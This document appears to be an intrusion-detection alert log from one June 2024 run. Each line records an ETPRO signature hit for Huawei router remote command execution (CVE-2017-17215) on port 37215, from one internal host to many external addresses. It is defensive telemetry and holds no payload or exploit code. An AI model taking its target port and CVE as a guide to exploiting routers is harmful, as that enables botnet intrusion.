                                                        06/13/24-21:33:00.871374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659037215192.168.2.14197.224.139.118
                                                        06/13/24-21:32:05.377769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999837215192.168.2.14197.5.240.217
                                                        06/13/24-21:33:00.868549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527637215192.168.2.14156.150.104.251
                                                        06/13/24-21:33:13.214258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410437215192.168.2.1441.39.95.180
                                                        06/13/24-21:32:50.610847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065637215192.168.2.14197.138.123.106
                                                        06/13/24-21:33:15.273059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3791037215192.168.2.14156.191.53.44
                                                        06/13/24-21:32:44.477433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446437215192.168.2.14197.236.163.33
                                                        06/13/24-21:32:28.045092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814437215192.168.2.14156.17.30.84
                                                        06/13/24-21:31:59.176756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697437215192.168.2.14197.8.169.118
                                                        06/13/24-21:32:42.420033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385637215192.168.2.14156.201.38.210
                                                        06/13/24-21:32:19.750646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080037215192.168.2.14156.213.46.56
                                                        06/13/24-21:32:44.451207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917437215192.168.2.1441.135.253.117
                                                        06/13/24-21:32:03.303881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552037215192.168.2.14197.126.60.187
                                                        06/13/24-21:32:23.943286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293637215192.168.2.14156.134.138.178
                                                        06/13/24-21:31:59.177336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651437215192.168.2.1441.73.140.186
                                                        06/13/24-21:32:56.759231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396237215192.168.2.14156.65.33.16
                                                        06/13/24-21:32:30.124604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740437215192.168.2.1441.112.180.3
                                                        06/13/24-21:32:58.839924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792037215192.168.2.14197.76.10.25
                                                        06/13/24-21:32:48.555808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423437215192.168.2.1441.204.43.8
                                                        06/13/24-21:32:11.488691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383837215192.168.2.14156.41.240.175
                                                        06/13/24-21:32:19.731171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470437215192.168.2.14197.118.192.242
                                                        06/13/24-21:32:21.803694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329837215192.168.2.14156.150.78.16
                                                        06/13/24-21:32:28.027624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625237215192.168.2.14197.19.201.201
                                                        06/13/24-21:32:30.127030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478837215192.168.2.1441.9.241.252
                                                        06/13/24-21:32:32.170484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630637215192.168.2.14197.164.28.127
                                                        06/13/24-21:32:23.930821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682437215192.168.2.1441.187.173.220
                                                        06/13/24-21:31:59.175929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925437215192.168.2.14156.137.45.2
                                                        06/13/24-21:32:52.654361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104237215192.168.2.14156.194.4.141
                                                        06/13/24-21:33:13.228070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776837215192.168.2.1441.2.10.83
                                                        06/13/24-21:33:05.017400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132237215192.168.2.14197.109.52.36
                                                        06/13/24-21:32:40.377016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468637215192.168.2.14197.114.123.19
                                                        06/13/24-21:32:42.408659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114837215192.168.2.14156.39.43.125
                                                        06/13/24-21:32:50.628775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3836037215192.168.2.14156.40.63.202
                                                        06/13/24-21:32:05.350703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259237215192.168.2.1441.88.142.173
                                                        06/13/24-21:32:05.377668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524837215192.168.2.1441.106.82.75
                                                        06/13/24-21:32:28.027794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714037215192.168.2.14197.104.30.23
                                                        06/13/24-21:32:25.976751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010237215192.168.2.14156.156.122.127
                                                        06/13/24-21:32:25.994247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912437215192.168.2.14197.230.198.221
                                                        06/13/24-21:32:50.631030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694837215192.168.2.14156.212.240.178
                                                        06/13/24-21:32:40.377509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357637215192.168.2.1441.188.52.63
                                                        06/13/24-21:32:42.405955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348237215192.168.2.1441.241.128.13
                                                        06/13/24-21:33:13.212525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257437215192.168.2.14156.116.138.136
                                                        06/13/24-21:32:30.093759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961837215192.168.2.14197.4.229.54
                                                        06/13/24-21:32:34.212712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661237215192.168.2.1441.149.76.31
                                                        06/13/24-21:32:48.551584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707437215192.168.2.14197.11.9.182
                                                        06/13/24-21:33:17.304327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675237215192.168.2.14156.7.82.122
                                                        06/13/24-21:32:38.301312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286037215192.168.2.14197.119.54.57
                                                        06/13/24-21:32:05.344952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578437215192.168.2.1441.119.106.247
                                                        06/13/24-21:32:25.992050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736037215192.168.2.14197.11.10.72
                                                        06/13/24-21:32:48.549866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688037215192.168.2.14156.100.224.236
                                                        06/13/24-21:32:11.486183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003037215192.168.2.1441.197.9.76
                                                        06/13/24-21:32:19.752985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077237215192.168.2.14156.160.210.227
                                                        06/13/24-21:32:42.418804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5234637215192.168.2.1441.206.235.148
                                                        06/13/24-21:32:54.724372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048037215192.168.2.1441.226.38.63
                                                        06/13/24-21:32:11.488946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4592637215192.168.2.1441.108.37.131
                                                        06/13/24-21:32:58.823878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442637215192.168.2.1441.35.195.202
                                                        06/13/24-21:33:13.227384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200237215192.168.2.14156.26.234.11
                                                        06/13/24-21:32:46.503880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442837215192.168.2.1441.93.75.168
                                                        06/13/24-21:33:15.257762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779437215192.168.2.14197.80.56.242
                                                        06/13/24-21:32:13.568143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487037215192.168.2.14197.163.54.14
                                                        06/13/24-21:32:03.275469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660837215192.168.2.14156.175.107.161
                                                        06/13/24-21:32:01.224287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701237215192.168.2.14197.86.129.246
                                                        06/13/24-21:32:42.422769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040637215192.168.2.1441.88.141.243
                                                        06/13/24-21:32:58.824419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609037215192.168.2.1441.59.150.141
                                                        06/13/24-21:32:40.359597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380437215192.168.2.1441.22.170.55
                                                        06/13/24-21:32:36.264161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810037215192.168.2.14156.67.22.150
                                                        06/13/24-21:32:52.660758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390037215192.168.2.14156.136.245.189
                                                        06/13/24-21:32:36.264123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536437215192.168.2.14197.44.178.58
                                                        06/13/24-21:33:15.273876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247837215192.168.2.14197.31.220.135
                                                        06/13/24-21:32:54.708386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943037215192.168.2.1441.211.199.90
                                                        06/13/24-21:33:04.993193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754037215192.168.2.1441.249.150.157
                                                        06/13/24-21:32:23.943799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085437215192.168.2.1441.214.202.172
                                                        06/13/24-21:33:00.885571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563237215192.168.2.14197.122.197.104
                                                        06/13/24-21:32:58.824583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466637215192.168.2.14197.127.105.254
                                                        06/13/24-21:33:05.014367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104237215192.168.2.1441.157.170.26
                                                        06/13/24-21:32:52.670571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442237215192.168.2.14156.35.132.167
                                                        06/13/24-21:31:57.091232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473437215192.168.2.14197.153.88.73
                                                        06/13/24-21:32:30.074895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050437215192.168.2.1441.34.46.75
                                                        06/13/24-21:33:15.271380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253437215192.168.2.14197.177.191.104
                                                        06/13/24-21:32:25.992509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631037215192.168.2.14197.236.44.157
                                                        06/13/24-21:33:05.010834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006237215192.168.2.1441.241.22.147
                                                        06/13/24-21:33:07.060894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876437215192.168.2.14156.126.89.245
                                                        06/13/24-21:32:32.164231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865637215192.168.2.14197.245.232.37
                                                        06/13/24-21:33:00.870442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017037215192.168.2.1441.207.58.145
                                                        06/13/24-21:33:07.059488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259237215192.168.2.14197.211.94.239
                                                        06/13/24-21:31:57.091682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834437215192.168.2.1441.3.135.97
                                                        06/13/24-21:32:28.044590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535037215192.168.2.14197.216.61.165
                                                        06/13/24-21:32:40.373769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607437215192.168.2.1441.69.39.206
                                                        06/13/24-21:33:13.212425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779837215192.168.2.14197.239.142.7
                                                        06/13/24-21:32:56.784999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620637215192.168.2.14197.222.108.6
                                                        06/13/24-21:33:00.867803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278637215192.168.2.14156.223.15.19
                                                        06/13/24-21:31:57.129779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083437215192.168.2.14197.168.107.124
                                                        06/13/24-21:32:01.220011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614037215192.168.2.14197.151.60.93
                                                        06/13/24-21:32:30.100869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896237215192.168.2.14156.25.239.182
                                                        06/13/24-21:32:07.403598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025237215192.168.2.1441.217.8.177
                                                        06/13/24-21:32:34.194483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379837215192.168.2.14156.233.57.146
                                                        06/13/24-21:32:03.308321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.14197.191.40.151
                                                        06/13/24-21:32:46.524502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025037215192.168.2.14197.103.93.107
                                                        06/13/24-21:33:15.276363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054437215192.168.2.1441.6.195.213
                                                        06/13/24-21:32:21.799806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810837215192.168.2.14156.15.215.158
                                                        06/13/24-21:32:13.568572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849037215192.168.2.1441.227.59.111
                                                        06/13/24-21:32:34.193960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098237215192.168.2.14156.140.196.20
                                                        06/13/24-21:32:58.823444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221037215192.168.2.1441.8.129.182
                                                        06/13/24-21:32:30.097627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350037215192.168.2.1441.27.201.138
                                                        06/13/24-21:32:40.376677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594637215192.168.2.14156.152.147.207
                                                        06/13/24-21:32:38.321998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326837215192.168.2.14197.61.248.131
                                                        06/13/24-21:32:42.408561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585037215192.168.2.14197.39.234.144
                                                        06/13/24-21:33:11.158494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726037215192.168.2.1441.49.219.136
                                                        06/13/24-21:32:09.455733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041637215192.168.2.14197.213.93.220
                                                        06/13/24-21:32:58.841556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316237215192.168.2.14156.65.156.239
                                                        06/13/24-21:32:13.544208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958837215192.168.2.14197.60.182.167
                                                        06/13/24-21:32:17.677871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096237215192.168.2.1441.50.140.41
                                                        06/13/24-21:32:21.804495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425437215192.168.2.1441.16.178.215
                                                        06/13/24-21:32:34.218011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858637215192.168.2.14156.254.228.100
                                                        06/13/24-21:32:11.506040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852837215192.168.2.1441.5.218.140
                                                        06/13/24-21:32:15.610506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655437215192.168.2.14156.30.213.191
                                                        06/13/24-21:32:54.724725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659637215192.168.2.14156.20.48.240
                                                        06/13/24-21:32:03.275513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516437215192.168.2.14197.144.49.247
                                                        06/13/24-21:32:19.726571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697237215192.168.2.1441.177.62.247
                                                        06/13/24-21:32:05.345723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942237215192.168.2.1441.121.195.244
                                                        06/13/24-21:32:15.606929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929037215192.168.2.14197.195.50.105
                                                        06/13/24-21:32:52.658859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326437215192.168.2.14156.39.213.77
                                                        06/13/24-21:32:05.370960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5690037215192.168.2.1441.204.151.115
                                                        06/13/24-21:32:54.726310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198837215192.168.2.14156.28.17.14
                                                        06/13/24-21:32:21.786696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720037215192.168.2.14156.152.79.136
                                                        06/13/24-21:33:13.227514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807237215192.168.2.1441.56.42.167
                                                        06/13/24-21:32:30.128811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880037215192.168.2.14197.92.22.118
                                                        06/13/24-21:32:21.785253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284637215192.168.2.14156.46.208.146
                                                        06/13/24-21:33:17.309486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808637215192.168.2.14156.15.26.160
                                                        06/13/24-21:32:30.074588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000237215192.168.2.14197.220.102.96
                                                        06/13/24-21:32:50.610157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602837215192.168.2.14156.131.88.212
                                                        06/13/24-21:32:01.248042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907037215192.168.2.14197.180.69.92
                                                        06/13/24-21:32:23.831133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852437215192.168.2.14197.136.177.106
                                                        06/13/24-21:32:56.789967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520037215192.168.2.1441.253.165.215
                                                        06/13/24-21:32:58.844006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4471437215192.168.2.14197.215.138.125
                                                        06/13/24-21:32:07.402540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416437215192.168.2.14156.69.148.229
                                                        06/13/24-21:32:52.654630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715837215192.168.2.1441.134.32.98
                                                        06/13/24-21:31:57.091972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892837215192.168.2.14156.238.129.165
                                                        06/13/24-21:31:57.152739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685237215192.168.2.14197.75.113.17
                                                        06/13/24-21:33:02.914346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555837215192.168.2.14156.210.2.142
                                                        06/13/24-21:33:07.042639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934437215192.168.2.14156.139.121.191
                                                        06/13/24-21:31:57.094092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858237215192.168.2.1441.167.21.178
                                                        06/13/24-21:32:56.753354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285437215192.168.2.1441.154.75.71
                                                        06/13/24-21:32:52.654816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468837215192.168.2.14197.163.211.116
                                                        06/13/24-21:32:01.219728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717237215192.168.2.1441.65.222.54
                                                        06/13/24-21:32:42.408865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057437215192.168.2.1441.159.12.242
                                                        06/13/24-21:32:42.404493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4185037215192.168.2.1441.252.57.43
                                                        06/13/24-21:32:46.503906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978037215192.168.2.14156.251.77.108
                                                        06/13/24-21:33:09.091083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829237215192.168.2.14197.148.90.62
                                                        06/13/24-21:32:36.245111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665237215192.168.2.14156.145.121.154
                                                        06/13/24-21:32:40.371819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883837215192.168.2.14197.181.230.131
                                                        06/13/24-21:32:17.696022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028637215192.168.2.14197.134.98.233
                                                        06/13/24-21:32:13.543107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794637215192.168.2.14197.38.47.48
                                                        06/13/24-21:32:32.154290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366237215192.168.2.14197.16.228.76
                                                        06/13/24-21:32:17.675626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910837215192.168.2.1441.61.254.21
                                                        06/13/24-21:32:44.454731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081437215192.168.2.1441.204.134.51
                                                        06/13/24-21:32:25.990162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883637215192.168.2.14197.42.207.127
                                                        06/13/24-21:33:13.213507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810637215192.168.2.14197.15.45.212
                                                        06/13/24-21:32:32.149176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316437215192.168.2.1441.38.140.126
                                                        06/13/24-21:32:38.303466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852437215192.168.2.14156.124.107.14
                                                        06/13/24-21:33:15.273662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019037215192.168.2.14197.126.87.234
                                                        06/13/24-21:32:58.820025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099837215192.168.2.1441.116.182.29
                                                        06/13/24-21:33:13.228697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392437215192.168.2.14156.47.97.185
                                                        06/13/24-21:32:25.972595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576237215192.168.2.14197.137.197.235
                                                        06/13/24-21:32:19.754484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819637215192.168.2.1441.3.114.252
                                                        06/13/24-21:32:42.409389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392037215192.168.2.14156.163.62.41
                                                        06/13/24-21:32:58.821704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025237215192.168.2.14156.120.169.236
                                                        06/13/24-21:33:09.127401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334637215192.168.2.1441.108.50.86
                                                        06/13/24-21:32:54.710703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398237215192.168.2.1441.32.71.101
                                                        06/13/24-21:32:13.546953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517437215192.168.2.1441.80.229.70
                                                        06/13/24-21:32:46.528314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183637215192.168.2.1441.132.80.65
                                                        06/13/24-21:32:03.276503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.14156.53.92.173
                                                        06/13/24-21:32:54.707173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704037215192.168.2.14197.52.47.103
                                                        06/13/24-21:32:42.404978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585437215192.168.2.14197.18.31.181
                                                        06/13/24-21:32:42.406488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410037215192.168.2.1441.103.41.234
                                                        06/13/24-21:32:13.547240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035837215192.168.2.1441.239.18.109
                                                        06/13/24-21:32:13.568294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398837215192.168.2.14156.190.142.19
                                                        06/13/24-21:32:21.787204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379037215192.168.2.14197.234.88.112
                                                        06/13/24-21:32:23.943373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800037215192.168.2.1441.134.184.131
                                                        06/13/24-21:33:07.039536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707037215192.168.2.1441.17.189.202
                                                        06/13/24-21:32:15.632605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036237215192.168.2.14156.211.214.10
                                                        06/13/24-21:32:34.195857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939437215192.168.2.14197.137.160.4
                                                        06/13/24-21:31:57.153760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077237215192.168.2.14197.32.105.53
                                                        06/13/24-21:33:02.911261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288437215192.168.2.14156.106.183.29
                                                        06/13/24-21:32:07.417104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314837215192.168.2.14197.228.41.168
                                                        06/13/24-21:31:59.197165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438837215192.168.2.1441.8.46.108
